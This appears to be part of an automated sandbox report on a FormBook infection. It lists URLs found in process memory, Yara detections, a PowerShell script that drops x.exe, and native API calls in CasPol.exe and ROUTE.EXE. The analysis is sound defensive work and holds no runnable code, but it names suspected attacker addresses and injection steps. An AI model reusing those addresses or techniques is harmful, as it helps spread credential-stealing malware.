Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpeg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.js
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.js
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.js
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281731105116.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281832298961.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202309/19/202309191047059862.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/08/202310081116526834.JPEG
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111308331250.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111319395468.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111338460502.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111409312441.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111427368389.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111441491430.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111525013882.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111607198826.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111658373793.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111718494999.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111815252000.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111825242696.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121004360227.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121033239413.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121059002828.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121111152889.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121333505679.jpg
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121405095931.jpg
Source: SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121427539351.jpg
Source: ROUTE.EXE, 0000000A.00000002.4265729687.00000000047F8000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004688000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: powershell.exe, 00000000.00000002.1837508516.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: ROUTE.EXE, 0000000A.00000002.4265729687.0000000004B1C000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.00000000049AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.antobloom.xyz/hzjg/?26NtD=ZPldbrB0ORCTO&wdo8x=JM
Source: ROUTE.EXE, 0000000A.00000002.4265729687.0000000004B1C000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.00000000049AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.antobloom.xyz/hzjg/?26NtD=ZPldbrB0ORCTO&wdo8x=JM
Source: ROUTE.EXE, 0000000A.00000002.4267934782.00000000077DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ROUTE.EXE, 0000000A.00000002.4265729687.00000000047F8000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004688000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ROUTE.EXE, 0000000A.00000002.4265729687.000000000401E000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.0000000003844000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.00000000036D4000.00000004.00000001.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000003EAE000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2387377884.000000001A694000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2088815716.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4264972370.0000000004340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2086505825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4264994740.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4265041424.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4266897553.0000000005720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2087258507.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4263501995.00000000026E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 6624, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

PE file contains section with special chars

Source: x.exe.0.dr

Static PE information: section name: ,$?"s

PE file has nameless sections

Source: x.exe.0.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0042C963 NtClose,	5_2_0042C963
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952B60 NtClose,LdrInitializeThunk,	5_2_01952B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_01952DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_01952C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019535C0 NtCreateMutant,LdrInitializeThunk,	5_2_019535C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01954340 NtSetContextThread,	5_2_01954340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01954650 NtSuspendThread,	5_2_01954650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952B80 NtQueryInformationFile,	5_2_01952B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952BA0 NtEnumerateValueKey,	5_2_01952BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952BF0 NtAllocateVirtualMemory,	5_2_01952BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952BE0 NtQueryValueKey,	5_2_01952BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952AB0 NtWaitForSingleObject,	5_2_01952AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952AD0 NtReadFile,	5_2_01952AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952AF0 NtWriteFile,	5_2_01952AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952DB0 NtEnumerateKey,	5_2_01952DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952DD0 NtDelayExecution,	5_2_01952DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952D10 NtMapViewOfSection,	5_2_01952D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952D00 NtSetInformationFile,	5_2_01952D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952D30 NtUnmapViewOfSection,	5_2_01952D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952CA0 NtQueryInformationToken,	5_2_01952CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952CC0 NtQueryVirtualMemory,	5_2_01952CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952CF0 NtOpenProcess,	5_2_01952CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952C00 NtQueryInformationProcess,	5_2_01952C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952C60 NtCreateKey,	5_2_01952C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952F90 NtProtectVirtualMemory,	5_2_01952F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952FB0 NtResumeThread,	5_2_01952FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952FA0 NtQuerySection,	5_2_01952FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952FE0 NtCreateFile,	5_2_01952FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952F30 NtCreateSection,	5_2_01952F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952F60 NtCreateProcessEx,	5_2_01952F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952E80 NtReadVirtualMemory,	5_2_01952E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952EA0 NtAdjustPrivilegesToken,	5_2_01952EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952EE0 NtQueueApcThread,	5_2_01952EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01952E30 NtWriteVirtualMemory,	5_2_01952E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01953090 NtSetValueKey,	5_2_01953090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01953010 NtOpenDirectoryObject,	5_2_01953010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019539B0 NtGetContextThread,	5_2_019539B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01953D10 NtOpenProcessToken,	5_2_01953D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01953D70 NtOpenThread,	5_2_01953D70
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA4340 NtSetContextThread,LdrInitializeThunk,	10_2_02EA4340
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA4650 NtSuspendThread,LdrInitializeThunk,	10_2_02EA4650
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2AF0 NtWriteFile,LdrInitializeThunk,	10_2_02EA2AF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2AD0 NtReadFile,LdrInitializeThunk,	10_2_02EA2AD0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_02EA2BE0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_02EA2BF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_02EA2BA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2B60 NtClose,LdrInitializeThunk,	10_2_02EA2B60
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_02EA2EE0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_02EA2E80
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2FE0 NtCreateFile,LdrInitializeThunk,	10_2_02EA2FE0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2FB0 NtResumeThread,LdrInitializeThunk,	10_2_02EA2FB0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2F30 NtCreateSection,LdrInitializeThunk,	10_2_02EA2F30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_02EA2CA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2C60 NtCreateKey,LdrInitializeThunk,	10_2_02EA2C60
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_02EA2C70
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_02EA2DF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2DD0 NtDelayExecution,LdrInitializeThunk,	10_2_02EA2DD0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_02EA2D30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_02EA2D10
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA35C0 NtCreateMutant,LdrInitializeThunk,	10_2_02EA35C0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA39B0 NtGetContextThread,LdrInitializeThunk,	10_2_02EA39B0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2AB0 NtWaitForSingleObject,	10_2_02EA2AB0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2B80 NtQueryInformationFile,	10_2_02EA2B80
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2EA0 NtAdjustPrivilegesToken,	10_2_02EA2EA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2E30 NtWriteVirtualMemory,	10_2_02EA2E30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2FA0 NtQuerySection,	10_2_02EA2FA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2F90 NtProtectVirtualMemory,	10_2_02EA2F90
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2F60 NtCreateProcessEx,	10_2_02EA2F60
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2CF0 NtOpenProcess,	10_2_02EA2CF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2CC0 NtQueryVirtualMemory,	10_2_02EA2CC0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2C00 NtQueryInformationProcess,	10_2_02EA2C00
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2DB0 NtEnumerateKey,	10_2_02EA2DB0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA2D00 NtSetInformationFile,	10_2_02EA2D00
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA3090 NtSetValueKey,	10_2_02EA3090
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA3010 NtOpenDirectoryObject,	10_2_02EA3010
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA3D70 NtOpenThread,	10_2_02EA3D70
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA3D10 NtOpenProcessToken,	10_2_02EA3D10
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02709350 NtReadFile,	10_2_02709350
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_027091F0 NtCreateFile,	10_2_027091F0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02709650 NtAllocateVirtualMemory,	10_2_02709650
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02709440 NtDeleteFile,	10_2_02709440
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_027094E0 NtClose,	10_2_027094E0

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00E228D0	4_2_00E228D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00E21CD8	4_2_00E21CD8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00E20848	4_2_00E20848
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00E211E1	4_2_00E211E1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00E228C0	4_2_00E228C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_00E207E0	4_2_00E207E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_004188D3	5_2_004188D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00401A86	5_2_00401A86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00401000	5_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_004028C0	5_2_004028C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_004100F3	5_2_004100F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00401120	5_2_00401120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00403200	5_2_00403200
